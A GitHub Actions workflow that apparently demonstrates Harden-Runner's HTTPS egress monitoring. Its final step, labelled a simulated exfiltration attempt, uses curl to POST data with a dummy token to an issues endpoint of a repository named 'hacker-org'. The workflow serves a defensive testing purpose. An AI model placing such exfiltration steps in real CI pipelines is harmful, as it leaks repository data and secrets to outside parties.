name: "Hosted: HTTPS Monitoring with Harden-Runner"
on:
  workflow_dispatch:

permissions:
  contents: read

jobs:
  build:
    permissions:
      contents: read  # for JasonEtco/create-an-issue to read template files
      issues: write  # for JasonEtco/create-an-issue to create new issues
    runs-on: ubuntu-latest
    steps:
      - uses: step-security/harden-runner@5c7944e73c4c2a096b17a9cb74d65b6c2bbafbde # v2.9.1
        with:
          egress-policy: audit

      - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0

      - uses: JasonEtco/create-an-issue@1b14a70e4d8dc185e5cc76d3bec9eab20257b2c5 # v2.9.2
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Simulate exfiltration attempt
        run: |
          curl -X POST -H "Authorization: token 123" \
          -H "Accept: application/vnd.github.v3+json" \
          https://api.github.com/repos/hacker-org/test-repo/issues \
          -d '{"title":"Issue Title","body":"Issue description goes here."}'
